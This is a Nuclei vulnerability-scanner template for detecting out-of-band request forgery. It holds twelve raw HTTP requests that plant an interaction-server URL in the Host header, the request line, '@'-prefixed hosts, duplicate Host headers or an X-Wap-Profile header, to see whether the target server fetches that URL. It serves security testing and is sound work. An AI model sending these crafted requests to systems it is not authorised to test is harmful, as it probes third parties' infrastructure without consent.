id: request-based-interaction-65
info:
  author: pdteam
  description: The remote server fetched a spoofed DNS Name from the request.
  name: OOB Request Based Interaction
  reference:
  - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
  severity: info
  tags: oast,ssrf,generic
requests:
- matchers:
  - name: http
    part: interactsh_protocol
    type: word
    words:
    - http
  matchers-condition: or
  raw:
  - 'GET / HTTP/1.1

    Host: {{interactsh-url}}

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET / HTTP/1.1

    Host: @{{interactsh-url}}

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET http://{{interactsh-url}}/ HTTP/1.1

    Host: {{Hostname}}

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET @{{interactsh-url}}/ HTTP/1.1

    Host: {{Hostname}}

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET {{interactsh-url}}:80/ HTTP/1.1

    Host: {{Hostname}}

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET {{interactsh-url}}:80/ HTTP/1.1

    Host: {{Hostname}}

    X-Wap-Profile: {{Hostname}}

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET / HTTP/1.1

    Host: {{interactsh-url}}

    Host: localhost

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET / HTTP/1.1

    Host: @{{interactsh-url}}

    Host: localhost

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET http://{{interactsh-url}}/ HTTP/1.1

    Host: {{Hostname}}

    Host: localhost

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET @{{interactsh-url}}/ HTTP/1.1

    Host: {{Hostname}}

    Host: localhost

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET {{interactsh-url}}:80/ HTTP/1.1

    Host: {{Hostname}}

    Host: localhost

    Cache-Control: no-transform

    Accept: */*


    '
  - 'GET {{interactsh-url}}:80/ HTTP/1.1

    Host: {{Hostname}}

    Host: localhost

    X-Wap-Profile: {{Hostname}}

    Cache-Control: no-transform

    Accept: */*


    '
  unsafe: true
